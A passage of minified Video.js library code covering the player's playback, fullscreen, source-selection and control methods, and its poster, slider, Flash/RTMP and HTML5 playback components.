technology.",b):"TypeError"===b.name?(v["default"]("Video.js: "+a+" unavailable on "+this.techName+" playback technology element.",b),this.tech.isReady_=!1):v["default"](b),b}},b.prototype.play=function(){return this.techCall("play"),this},b.prototype.pause=function(){return this.techCall("pause"),this},b.prototype.paused=function(){return this.techGet("paused")===!1?!1:!0},b.prototype.scrubbing=function(a){return void 0!==a?(this.scrubbing_=!!a,a?this.addClass("vjs-scrubbing"):this.removeClass("vjs-scrubbing"),this):this.scrubbing_},b.prototype.currentTime=function(a){return void 0!==a?(this.techCall("setCurrentTime",a),this):this.cache_.currentTime=this.techGet("currentTime")||0},b.prototype.duration=function(a){return void 0!==a?(this.cache_.duration=parseFloat(a),this):(void 0===this.cache_.duration&&this.updateDuration(),this.cache_.duration||0)},b.prototype.remainingTime=function(){return this.duration()-this.currentTime()},b.prototype.buffered=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){var a=this.techGet("buffered");return a&&a.length||(a=y.createTimeRange(0,0)),a}),b.prototype.bufferedPercent=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){return z.bufferedPercent(this.buffered(),this.duration())}),b.prototype.bufferedEnd=function(){var a=this.buffered(),b=this.duration(),c=a.end(a.length-1);return c>b&&(c=b),c},b.prototype.volume=function(a){var b=void 0;return void 0!==a?(b=Math.max(0,Math.min(1,parseFloat(a))),this.cache_.volume=b,this.techCall("setVolume",b),this):(b=parseFloat(this.techGet("volume")),isNaN(b)?1:b)},b.prototype.muted=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){return void 0!==a?(this.techCall("setMuted",a),this):this.techGet("muted")||!1}),b.prototype.supportsFullScreen=function(){return this.techGet("supportsFullScreen")||!1},b.prototype.isFullscreen=function(a){return void 0!==a?(this.isFullscreen_=!!a,this):!!this.isFullscreen_},b.prototype.isFullScreen=function(a){return v["default"].warn('player.isFullScreen() has been deprecated, use player.isFullscreen() with a lowercase "s")'),this.isFullscreen(a)},b.prototype.requestFullscreen=function(){var a=B["default"];return this.isFullscreen(!0),a.requestFullscreen?(m.on(j["default"],a.fullscreenchange,q.bind(this,function b(){this.isFullscreen(j["default"][a.fullscreenElement]),this.isFullscreen()===!1&&m.off(j["default"],a.fullscreenchange,b),this.trigger("fullscreenchange")})),this.el_[a.requestFullscreen]()):this.tech.supportsFullScreen()?this.techCall("enterFullScreen"):(this.enterFullWindow(),this.trigger("fullscreenchange")),this},b.prototype.requestFullScreen=function(){return v["default"].warn('player.requestFullScreen() has been deprecated, use player.requestFullscreen() with a lowercase "s")'),this.requestFullscreen()},b.prototype.exitFullscreen=function(){var a=B["default"];return this.isFullscreen(!1),a.requestFullscreen?j["default"][a.exitFullscreen]():this.tech.supportsFullScreen()?this.techCall("exitFullScreen"):(this.exitFullWindow(),this.trigger("fullscreenchange")),this},b.prototype.cancelFullScreen=function(){return v["default"].warn("player.cancelFullScreen() has been deprecated, use player.exitFullscreen()"),this.exitFullscreen()},b.prototype.enterFullWindow=function(){this.isFullWindow=!0,this.docOrigOverflow=j["default"].documentElement.style.overflow,m.on(j["default"],"keydown",q.bind(this,this.fullWindowOnEscKey)),j["default"].documentElement.style.overflow="hidden",o.addElClass(j["default"].body,"vjs-full-window"),this.trigger("enterFullWindow")},b.prototype.fullWindowOnEscKey=function(a){27===a.keyCode&&(this.isFullscreen()===!0?this.exitFullscreen():this.exitFullWindow())},b.prototype.exitFullWindow=function(){this.isFullWindow=!1,m.off(j["default"],"keydown",this.fullWindowOnEscKey),j["default"].documentElement.style.overflow=this.docOrigOverflow,o.removeElClass(j["default"].body,"vjs-full-window"),this.trigger("exitFullWindow")},b.prototype.selectSource=function(a){for(var b=0,c=this.options_.techOrder;b<c.length;b++){var d=x["default"](c[b]),e=h["default"].getComponent(d);if(e){if(e.isSupported())for(var f=0,g=a;f<g.length;f++){var i=g[f];if(e.canPlaySource(i))return{source:i,tech:d}}}else v["default"].error('The "'+d+'" tech is undefined. Skipped browser support check for that tech.')}return!1},b.prototype.src=function(a){if(void 0===a)return this.techGet("src");var b=h["default"].getComponent(this.techName);return Array.isArray(a)?this.sourceList_(a):"string"==typeof a?this.src({src:a}):a instanceof Object&&(a.type&&!b.canPlaySource(a)?this.sourceList_([a]):(this.cache_.src=a.src,this.currentType_=a.type||"",this.ready(function(){b.prototype.hasOwnProperty("setSource")?this.techCall("setSource",a):this.techCall("src",a.src),"auto"===this.options_.preload&&this.load(),this.options_.autoplay&&this.play()}))),this},b.prototype.sourceList_=function(a){var b=this.selectSource(a);b?b.tech===this.techName?this.src(b.source):this.loadTech(b.tech,b.source):(this.setTimeout(function(){this.error({code:4,message:this.localize(this.options_.notSupportedMessage)})},0),this.triggerReady())},b.prototype.load=function(){return this.techCall("load"),this},b.prototype.currentSrc=function(){return this.techGet("currentSrc")||this.cache_.src||""},b.prototype.currentType=function(){return this.currentType_||""},b.prototype.preload=function(a){return void 0!==a?(this.techCall("setPreload",a),this.options_.preload=a,this):this.techGet("preload")},b.prototype.autoplay=function(a){return void 0!==a?(this.techCall("setAutoplay",a),this.options_.autoplay=a,this):this.techGet("autoplay",a)},b.prototype.loop=function(a){return void 0!==a?(this.techCall("setLoop",a),this.options_.loop=a,this):this.techGet("loop")},b.prototype.poster=function(a){return void 0===a?this.poster_:(a||(a=""),this.poster_=a,this.techCall("setPoster",a),this.trigger("posterchange"),this)},b.prototype.controls=function(a){return void 0!==a?(a=!!a,this.controls_!==a&&(this.controls_=a,this.usingNativeControls()&&this.techCall("setControls",a),a?(this.removeClass("vjs-controls-disabled"),this.addClass("vjs-controls-enabled"),this.trigger("controlsenabled"),this.usingNativeControls()||this.addTechControlsListeners()):(this.removeClass("vjs-controls-enabled"),this.addClass("vjs-controls-disabled"),this.trigger("controlsdisabled"),this.usingNativeControls()||this.removeTechControlsListeners())),this):!!this.controls_},b.prototype.usingNativeControls=function(a){return void 0!==a?(a=!!a,this.usingNativeControls_!==a&&(this.usingNativeControls_=a,a?(this.addClass("vjs-using-native-controls"),this.trigger("usingnativecontrols")):(this.removeClass("vjs-using-native-controls"),this.trigger("usingcustomcontrols"))),this):!!this.usingNativeControls_},b.prototype.error=function(a){return void 0===a?this.error_||null:null===a?(this.error_=a,this.removeClass("vjs-error"),this):(this.error_=a instanceof D["default"]?a:new D["default"](a),this.trigger("error"),this.addClass("vjs-error"),v["default"].error("(CODE:"+this.error_.code+" "+D["default"].errorTypes[this.error_.code]+")",this.error_.message,this.error_),this)},b.prototype.ended=function(){return this.techGet("ended")},b.prototype.seeking=function(){return this.techGet("seeking")},b.prototype.seekable=function(){return this.techGet("seekable")},b.prototype.reportUserActivity=function(){this.userActivity_=!0},b.prototype.userActive=function(a){return void 0!==a?(a=!!a,a!==this.userActive_&&(this.userActive_=a,a?(this.userActivity_=!0,this.removeClass("vjs-user-inactive"),this.addClass("vjs-user-active"),this.trigger("useractive")):(this.userActivity_=!1,this.tech&&this.tech.one("mousemove",function(a){a.stopPropagation(),a.preventDefault()}),this.removeClass("vjs-user-active"),this.addClass("vjs-user-inactive"),this.trigger("userinactive"))),this):this.userActive_},b.prototype.listenForUserActivity=function(){var a=void 0,b=void 0,c=void 0,d=q.bind(this,this.reportUserActivity),e=function(a){(a.screenX!==b||a.screenY!==c)&&(b=a.screenX,c=a.screenY,d())},f=function(){d(),this.clearInterval(a),a=this.setInterval(d,250)},g=function(){d(),this.clearInterval(a)};this.on("mousedown",f),this.on("mousemove",e),this.on("mouseup",g),this.on("keydown",d),this.on("keyup",d);{var h=void 0;this.setInterval(function(){if(this.userActivity_){this.userActivity_=!1,this.userActive(!0),this.clearTimeout(h);var a=this.options_.inactivityTimeout;a>0&&(h=this.setTimeout(function(){this.userActivity_||this.userActive(!1)},a))}},250)}},b.prototype.playbackRate=function(a){return void 0!==a?(this.techCall("setPlaybackRate",a),this):this.tech&&this.tech.featuresPlaybackRate?this.techGet("playbackRate"):1},b.prototype.isAudio=function(a){return void 0!==a?(this.isAudio_=!!a,this):!!this.isAudio_},b.prototype.networkState=function(){return this.techGet("networkState")},b.prototype.readyState=function(){return this.techGet("readyState")},b.prototype.textTracks=function(){return this.tech&&this.tech.textTracks()},b.prototype.remoteTextTracks=function(){return this.tech&&this.tech.remoteTextTracks()},b.prototype.addTextTrack=function(a,b,c){return this.tech&&this.tech.addTextTrack(a,b,c)},b.prototype.addRemoteTextTrack=function(a){return this.tech&&this.tech.addRemoteTextTrack(a)},b.prototype.removeRemoteTextTrack=function(a){this.tech&&this.tech.removeRemoteTextTrack(a)},b.prototype.videoWidth=function(){return this.tech&&this.tech.videoWidth&&this.tech.videoWidth()||0},b.prototype.videoHeight=function(){return this.tech&&this.tech.videoHeight&&this.tech.videoHeight()||0},b.prototype.language=function(a){return void 0===a?this.language_:(this.language_=(""+a).toLowerCase(),this)},b.prototype.languages=function(){return L["default"](F["default"].languages,this.languages_)},b.prototype.toJSON=function(){var a=L["default"](this.options_),b=a.tracks;a.tracks=[];for(var c=0;c<b.length;c++){var d=b[c];d=L["default"](d),d.player=void 0,a.tracks[c]=d}return a},b.getTagSettings=function(a){var b={sources:[],tracks:[]},c=o.getElAttributes(a),d=c["data-setup"];if(null!==d){var e=H["default"](d||"{}"),f=e[0],g=e[1];f&&v["default"].error(f),J["default"](c,g)}if(J["default"](b,c),a.hasChildNodes())for(var h=a.childNodes,i=0,j=h.length;j>i;i++){var k=h[i],l=k.nodeName.toLowerCase();"source"===l?b.sources.push(o.getElAttributes(k)):"track"===l&&b.tracks.push(o.getElAttributes(k))}return b},b}(h["default"]));V.players={},V.prototype.options_=F["default"],V.prototype.handleLoadedMetaData,V.prototype.handleLoadedData,V.prototype.handleLoadedAllData,V.prototype.handleUserActive,V.prototype.handleUserInactive,V.prototype.handleTimeUpdate,V.prototype.handleVolumeChange,V.prototype.handleError,V.prototype.flexNotSupported_=function(){var a=j["default"].createElement("i");return!("flexBasis"in a.style||"webkitFlexBasis"in a.style||"mozFlexBasis"in a.style||"msFlexBasis"in a.style||"msFlexOrder"in a.style)},h["default"].registerComponent("Player",V),c["default"]=V,b.exports=c["default"]},{"./big-play-button.js":50,"./component.js":52,"./control-bar/control-bar.js":53,"./error-display.js":82,"./fullscreen-api.js":85,"./global-options.js":86,"./loading-spinner.js":87,"./media-error.js":88,"./poster-image.js":94,"./tech/html5.js":99,"./tech/loader.js":100,"./tracks/text-track-display.js":103,"./tracks/text-track-settings.js":106,"./utils/browser.js":108,"./utils/buffer.js":109,"./utils/dom.js":111,"./utils/events.js":112,"./utils/fn.js":113,"./utils/guid.js":115,"./utils/log.js":116,"./utils/merge-options.js":117,"./utils/time-ranges.js":119,"./utils/to-title-case.js":120,"global/document":1,"global/window":2,"object.assign":44,"safe-json-parse/tuple":49}],93:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("./player.js"),f=d(e),g=function(a,b){f["default"].prototype[a]=b};c["default"]=g,b.exports=c["default"]},{"./player.js":92}],94:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./button.js"),h=d(g),i=a("./component.js"),j=d(i),k=a("./utils/fn.js"),l=d(k),m=a("./utils/dom.js"),n=d(m),o=a("./utils/browser.js"),p=d(o),q=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.update(),c.on("posterchange",l.bind(this,this.update))}return f(b,a),b.prototype.dispose=function(){this.player().off("posterchange",this.update),a.prototype.dispose.call(this)},b.prototype.createEl=function(){var a=n.createEl("div",{className:"vjs-poster",tabIndex:-1});return p.BACKGROUND_SIZE_SUPPORTED||(this.fallbackImg_=n.createEl("img"),a.appendChild(this.fallbackImg_)),a},b.prototype.update=function(){var a=this.player().poster();this.setSrc(a),a?this.show():this.hide()},b.prototype.setSrc=function(a){if(this.fallbackImg_)this.fallbackImg_.src=a;else{var b="";a&&(b='url("'+a+'")'),this.el_.style.backgroundImage=b}},b.prototype.handleClick=function(){this.player_.paused()?this.player_.play():this.player_.pause()},b}(h["default"]);j["default"].registerComponent("PosterImage",q),c["default"]=q,b.exports=c["default"]},{"./button.js":51,"./component.js":52,"./utils/browser.js":108,"./utils/dom.js":111,"./utils/fn.js":113}],95:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("./utils/events.js"),f=d(e),g=a("global/document"),h=d(g),i=a("global/window"),j=d(i),k=!1,l=void 0,m=function(){var a=h["default"].getElementsByTagName("video"),b=h["default"].getElementsByTagName("audio"),c=[];if(a&&a.length>0)for(var d=0,e=a.length;e>d;d++)c.push(a[d]);if(b&&b.length>0)for(var d=0,e=b.length;e>d;d++)c.push(b[d]);if(c&&c.length>0)for(var d=0,e=c.length;e>d;d++){var f=c[d];if(!f||!f.getAttribute){n(1);break}if(void 0===f.player){var g=f.getAttribute("data-setup");if(null!==g){l(f)}}}else k||n(1)},n=function(a,b){l=b,setTimeout(m,a)};"complete"===h["default"].readyState?k=!0:f.one(j["default"],"load",function(){k=!0});var o=function(){return k};c.autoSetup=m,c.autoSetupTimeout=n,c.hasLoaded=o},{"./utils/events.js":112,"global/document":1,"global/window":2}],96:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../component.js"),h=d(g),i=a("../utils/dom.js"),j=d(i),k=a("../utils/round-float.js"),l=d(k),m=a("global/document"),n=d(m),o=a("object.assign"),p=d(o),q=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.bar=this.getChild(this.options_.barName),this.handle=this.getChild(this.options_.handleName),this.vertical(!!this.options_.vertical),this.on("mousedown",this.handleMouseDown),this.on("touchstart",this.handleMouseDown),this.on("focus",this.handleFocus),this.on("blur",this.handleBlur),this.on("click",this.handleClick),this.on(c,"controlsvisible",this.update),this.on(c,this.playerEvent,this.update)}return f(b,a),b.prototype.createEl=function(b){var c=void 0===arguments[1]?{}:arguments[1];return c.className=c.className+" vjs-slider",c=p["default"]({role:"slider","aria-valuenow":0,"aria-valuemin":0,"aria-valuemax":100,tabIndex:0},c),a.prototype.createEl.call(this,b,c)},b.prototype.handleMouseDown=function(a){a.preventDefault(),j.blockTextSelection(),this.addClass("vjs-sliding"),this.on(n["default"],"mousemove",this.handleMouseMove),this.on(n["default"],"mouseup",this.handleMouseUp),this.on(n["default"],"touchmove",this.handleMouseMove),this.on(n["default"],"touchend",this.handleMouseUp),this.handleMouseMove(a)},b.prototype.handleMouseMove=function(){},b.prototype.handleMouseUp=function(){j.unblockTextSelection(),this.removeClass("vjs-sliding"),this.off(n["default"],"mousemove",this.handleMouseMove),this.off(n["default"],"mouseup",this.handleMouseUp),this.off(n["default"],"touchmove",this.handleMouseMove),this.off(n["default"],"touchend",this.handleMouseUp),this.update()},b.prototype.update=function(){if(this.el_){var a=this.getPercent(),b=this.bar;if(b){("number"!=typeof a||a!==a||0>a||a===1/0)&&(a=0);var c=l["default"](100*a,2)+"%";this.vertical()?b.el().style.height=c:b.el().style.width=c}}},b.prototype.calculateDistance=function(a){var b=this.el_,c=j.findElPosition(b),d=b.offsetWidth,e=b.offsetHeight,f=this.handle;if(this.options_.vertical){var g=c.top,h=void 0;if(h=a.changedTouches?a.changedTouches[0].pageY:a.pageY,f){var i=f.el().offsetHeight;g+=i/2,e-=i}return Math.max(0,Math.min(1,(g-h+e)/e))}var k=c.left,l=void 0;if(l=a.changedTouches?a.changedTouches[0].pageX:a.pageX,f){var m=f.el().offsetWidth;k+=m/2,d-=m}return Math.max(0,Math.min(1,(l-k)/d))},b.prototype.handleFocus=function(){this.on(n["default"],"keydown",this.handleKeyPress)},b.prototype.handleKeyPress=function(a){37===a.which||40===a.which?(a.preventDefault(),this.stepBack()):(38===a.which||39===a.which)&&(a.preventDefault(),this.stepForward())},b.prototype.handleBlur=function(){this.off(n["default"],"keydown",this.handleKeyPress)},b.prototype.handleClick=function(a){a.stopImmediatePropagation(),a.preventDefault()},b.prototype.vertical=function(a){return void 0===a?this.vertical_||!1:(this.vertical_=!!a,this.addClass(this.vertical_?"vjs-slider-vertical":"vjs-slider-horizontal"),this)},b}(h["default"]);h["default"].registerComponent("Slider",q),c["default"]=q,b.exports=c["default"]},{"../component.js":52,"../utils/dom.js":111,"../utils/round-float.js":118,"global/document":1,"object.assign":44}],97:[function(a,b,c){"use strict";function d(a){return a.streamingFormats={"rtmp/mp4":"MP4","rtmp/flv":"FLV"},a.streamFromParts=function(a,b){return a+"&"+b},a.streamToParts=function(a){var b={connection:"",stream:""};if(!a)return b;var c=a.indexOf("&"),d=void 0;return-1!==c?d=c+1:(c=d=a.lastIndexOf("/")+1,0===c&&(c=d=a.length)),b.connection=a.substring(0,c),b.stream=a.substring(d,a.length),b},a.isStreamingType=function(b){return b in a.streamingFormats},a.RTMP_RE=/^rtmp[set]?:\/\//i,a.isStreamingSrc=function(b){return a.RTMP_RE.test(b)},a.rtmpSourceHandler={},a.rtmpSourceHandler.canHandleSource=function(b){return a.isStreamingType(b.type)||a.isStreamingSrc(b.src)?"maybe":""},a.rtmpSourceHandler.handleSource=function(b,c){var d=a.streamToParts(b.src);c.setRtmpConnection(d.connection),c.setRtmpStream(d.stream)},a.registerSourceHandler(a.rtmpSourceHandler),a}c.__esModule=!0,c["default"]=d,b.exports=c["default"]},{}],98:[function(a,b,c){"use strict";function d(a){var b=a.charAt(0).toUpperCase()+a.slice(1);z["set"+b]=function(b){return this.el_.vjs_setProperty(a,b)}}function e(a){z[a]=function(){return this.el_.vjs_getProperty(a)}}var f=function(a){return a&&a.__esModule?a:{"default":a}},g=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},h=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;for(var i=a("./tech"),j=f(i),k=a("../utils/dom.js"),l=f(k),m=a("../utils/url.js"),n=f(m),o=a("../utils/time-ranges.js"),p=a("./flash-rtmp"),q=f(p),r=a("../component"),s=f(r),t=a("global/window"),u=f(t),v=a("object.assign"),w=f(v),x=u["default"].navigator,y=function(a){function b(c,d){g(this,b),a.call(this,c,d),c.source&&this.ready(function(){this.setSource(c.source)}),c.startTime&&this.ready(function(){this.load(),this.play(),this.currentTime(c.startTime)}),u["default"].videojs=u["default"].videojs||{},u["default"].videojs.Flash=u["default"].videojs.Flash||{},u["default"].videojs.Flash.onReady=b.onReady,u["default"].videojs.Flash.onEvent=b.onEvent,u["default"].videojs.Flash.onError=b.onError,this.on("seeked",function(){this.lastSeekTarget_=void 0})}return h(b,a),b.prototype.createEl=function(){var a=this.options_,c=a.techId,d=w["default"]({readyFunction:"videojs.Flash.onReady",eventProxyFunction:"videojs.Flash.onEvent",errorEventProxyFunction:"videojs.Flash.onError",autoplay:a.autoplay,preload:a.preload,loop:a.loop,muted:a.muted},a.flashVars),e=w["default"]({wmode:"opaque",bgcolor:"#000000"},a.params),f=w["default"]({id:c,name:c,"class":"vjs-tech"},a.attributes);return this.el_=b.embed(a.swf,d,e,f),this.el_.tech=this,this.el_},b.prototype.play=function(){this.el_.vjs_play()},b.prototype.pause=function(){this.el_.vjs_pause()},b.prototype.src=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){return void 0===a?this.currentSrc():this.setSrc(a)}),b.prototype.setSrc=function(a){if(a=n.getAbsoluteURL(a),this.el_.vjs_src(a),this.autoplay()){var b=this;this.setTimeout(function(){b.play()},0)}},b.prototype.seeking=function(){return void 0!==this.lastSeekTarget_},b.prototype.setCurrentTime=function(b){var c=this.seekable();c.length&&(b=b>c.start(0)?b:c.start(0),b=b<c.end(c.length-1)?b:c.end(c.length-1),this.lastSeekTarget_=b,this.trigger("seeking"),this.el_.vjs_setProperty("currentTime",b),a.prototype.setCurrentTime.call(this))},b.prototype.currentTime=function(){return this.seeking()?this.lastSeekTarget_||0:this.el_.vjs_getProperty("currentTime")},b.prototype.currentSrc=function(){return this.currentSource_?this.currentSource_.src:this.el_.vjs_getProperty("currentSrc")},b.prototype.load=function(){this.el_.vjs_load()},b.prototype.poster=function(){this.el_.vjs_getProperty("poster")},b.prototype.setPoster=function(){},b.prototype.seekable=function(){var a=this.duration();return 0===a?o.createTimeRange():o.createTimeRange(0,a)},b.prototype.buffered=function(){return o.createTimeRange(0,this.el_.vjs_getProperty("buffered"))},b.prototype.supportsFullScreen=function(){return!1},b.prototype.enterFullScreen=function(){return!1},b}(j["default"]),z=y.prototype,A="rtmpConnection,rtmpStream,preload,defaultPlaybackRate,playbackRate,autoplay,loop,mediaGroup,controller,controls,volume,muted,defaultMuted".split(","),B="error,networkState,readyState,initialTime,duration,startOffsetTime,paused,ended,videoTracks,audioTracks,videoWidth,videoHeight".split(","),C=0;C<A.length;C++)e(A[C]),d(A[C]);for(var C=0;C<B.length;C++)e(B[C]);y.isSupported=function(){return y.version()[0]>=10},j["default"].withSourceHandlers(y),y.nativeSourceHandler={},y.nativeSourceHandler.canHandleSource=function(a){function b(a){var b=n.getFileExtension(a);return b?"video/"+b:""}var c;return c=a.type?a.type.replace(/;.*/,"").toLowerCase():b(a.src),c in y.formats?"maybe":""},y.nativeSourceHandler.handleSource=function(a,b){b.setSrc(a.src)},y.nativeSourceHandler.dispose=function(){},y.registerSourceHandler(y.nativeSourceHandler),y.formats={"video/flv":"FLV","video/x-flv":"FLV","video/mp4":"MP4","video/m4v":"MP4"},y.onReady=function(a){var b=l.getEl(a),c=b&&b.tech;c&&c.el()&&y.checkReady(c)},y.checkReady=function(a){a.el()&&(a.el().vjs_getProperty?a.triggerReady():this.setTimeout(function(){y.checkReady(a)},50))},y.onEvent=function(a,b){var c=l.getEl(a).tech;c.trigger(b)},y.onError=function(a,b){var c=l.getEl(a).tech,d="FLASH: "+b;"srcnotfound"===b?c.trigger("error",{code:4,message:d}):c.trigger("error",d)},y.version=function(){var a="0,0,0";try{a=new u["default"].ActiveXObject("ShockwaveFlash.ShockwaveFlash").GetVariable("$version").replace(/\D+/g,",").match(/^,?(.+),?$/)[1]}catch(b){try{x.mimeTypes["application/x-shockwave-flash"].enabledPlugin&&(a=(x.plugins["Shockwave Flash 2.0"]||x.plugins["Shockwave Flash"]).description.replace(/\D+/g,",").match(/^,?(.+),?$/)[1])}catch(c){}}return a.split(",")},y.embed=function(a,b,c,d){var e=y.getEmbedCode(a,b,c,d),f=l.createEl("div",{innerHTML:e}).childNodes[0];return f},y.getEmbedCode=function(a,b,c,d){var e='<object type="application/x-shockwave-flash" ',f="",g="",h="";return b&&Object.getOwnPropertyNames(b).forEach(function(a){f+=""+a+"="+b[a]+"&"}),c=w["default"]({movie:a,flashvars:f,allowScriptAccess:"always",allowNetworking:"all"},c),Object.getOwnPropertyNames(c).forEach(function(a){g+='<param name="'+a+'" value="'+c[a]+'" />'}),d=w["default"]({data:a,width:"100%",height:"100%"},d),Object.getOwnPropertyNames(d).forEach(function(a){h+=""+a+'="'+d[a]+'" '}),""+e+h+">"+g+"</object>"},q["default"](y),s["default"].registerComponent("Flash",y),c["default"]=y,b.exports=c["default"]},{"../component":52,"../utils/dom.js":111,"../utils/time-ranges.js":119,"../utils/url.js":121,"./flash-rtmp":97,"./tech":101,"global/window":2,"object.assign":44}],99:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./tech.js"),h=d(g),i=a("../component"),j=d(i),k=a("../utils/dom.js"),l=d(k),m=a("../utils/url.js"),n=d(m),o=a("../utils/fn.js"),p=d(o),q=a("../utils/log.js"),r=d(q),s=a("../utils/browser.js"),t=d(s),u=a("global/document"),v=d(u),w=a("global/window"),x=d(w),y=a("object.assign"),z=d(y),A=a("../utils/merge-options.js"),B=d(A),C=function(a){function b(c,d){e(this,b),a.call(this,c,d);var f=c.source;if(f&&(this.el_.currentSrc!==f.src||c.tag&&3===c.tag.initNetworkState_)&&this.setSource(f),this.el_.hasChildNodes()){for(var g=this.el_.childNodes,h=g.length,i=[];h--;){var j=g[h],k=j.nodeName.toLowerCase();"track"===k&&(this.featuresNativeTextTracks?this.remoteTextTracks().addTrack_(j.track):i.push(j))}for(var l=0;l<i.length;l++)this.el_.removeChild(i[l])}this.featuresNativeTextTracks&&this.on("loadstart",p.bind(this,this.hideCaptions)),t.TOUCH_ENABLED&&c.nativeControlsForTouch===!0&&this.trigger("usenativecontrols"),this.triggerReady()}return f(b,a),b.prototype.dispose=function(){b.disposeMediaElement(this.el_),a.prototype.dispose.call(this)},b.prototype.createEl=function(){var a=this.options_.tag;if(!a||this.movingMediaElementInDOM===!1){if(a){var c=a.cloneNode(!1);a.parentNode.insertBefore(c,a),b.disposeMediaElement(a),a=c}else{a=v["default"].createElement("video");var d=this.options_.tag&&l.getElAttributes(this.options_.tag),e=B["default"]({},d);t.TOUCH_ENABLED&&this.options_.nativeControlsForTouch===!0||delete e.controls,l.setElAttributes(a,z["default"](e,{id:this.options_.techId,"class":"vjs-tech"}))}if(this.options_.tracks)for(var f=0;f<this.options_.tracks.length;f++){var g=this.options_.tracks[f],h=v["default"].createElement("track");h.kind=g.kind,h.label=g.label,h.srclang=g.srclang,h.src=g.src,"default"in g&&h.setAttribute("default","default"),a.appendChild(h)}}for(var i=["autoplay","preload","loop","muted"],f=i.length-1;f>=0;f--){var j=i[f],k={};"undefined"!=typeof this.options_[j]&&(k[j]=this.options_[j]),l.setElAttributes(a,k)}return a},b.prototype.hideCaptions=function(){for(var a=this.el_.querySelectorAll("track"),b=a.length,c={captions:1,subtitles:1};b--;){var d=a[b].track;d&&d.kind in c&&!a[b]["default"]&&(d.mode="disabled")}},b.prototype.play=function(){this.el_.play()},b.prototype.pause=function(){this.el_.pause()},b.prototype.paused=function(){return this.el_.paused},b.prototype.currentTime=function(){return this.el_.currentTime},b.prototype.setCurrentTime=function(a){try{this.el_.currentTime=a}catch(b){r["default"](b,"Video is not ready. (Video.js)")}},b.prototype.duration=function(){return this.el_.duration||0},b.prototype.buffered=function(){return this.el_.buffered},b.prototype.volume=function(){return this.el_.volume},b.prototype.setVolume=function(a){this.el_.volume=a},b.prototype.muted=function(){return this.el_.muted},b.prototype.setMuted=function(a){this.el_.muted=a},b.prototype.width=function(){return this.el_.offsetWidth},b.prototype.height=function(){return this.el_.offsetHeight},b.prototype.supportsFullScreen=function(){if("function"==typeof this.el_.webkitEnterFullScreen){var a=x["default"].navigator.userAgent;if(/Android/.test(a)||!/Chrome|Mac OS X 10.5/.test(a))return!0}return!1},b.prototype.enterFullScreen=function(){var a=this.el_;"webkitDisplayingFullscreen"in a&&this.one("webkitbeginfullscreen",function(){this.one("webkitendfullscreen",function(){this.trigger("fullscreenchange",{isFullscreen:!1})}),this.trigger("fullscreenchange",{isFullscreen:!0})}),a.paused&&a.networkState<=a.HAVE_METADATA?(this.el_.play(),this.setTimeout(function(){a.pause(),a.webkitEnterFullScreen()},0)):a.webkitEnterFullScreen()},b.prototype.exitFullScreen=function(){this.el_.webkitExitFullScreen()},b.prototype.src=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){return void 0===a?this.el_.src:void this.setSrc(a)}),b.prototype.setSrc=function(a){this.el_.src=a},b.prototype.load=function(){this.el_.load()},b.prototype.currentSrc=function(){return this.el_.currentSrc},b.prototype.poster=function(){return this.el_.poster},b.prototype.setPoster=function(a){this.el_.poster=a},b.prototype.preload=function(){return this.el_.preload},b.prototype.setPreload=function(a){this.el_.preload=a},b.prototype.autoplay=function(){return this.el_.autoplay},b.prototype.setAutoplay=function(a){this.el_.autoplay=a},b.prototype.controls=function(){return this.el_.controls},b.prototype.setControls=function(a){this.el_.controls=!!a},b.prototype.loop=function(){return this.el_.loop},b.prototype.setLoop=function(a){this.el_.loop=a},b.prototype.error=function(){return this.el_.error},b.prototype.seeking=function(){return this.el_.seeking},b.prototype.seekable=function(){return this.el_.seekable},b.prototype.ended=function(){return this.el_.ended},b.prototype.defaultMuted=function(){
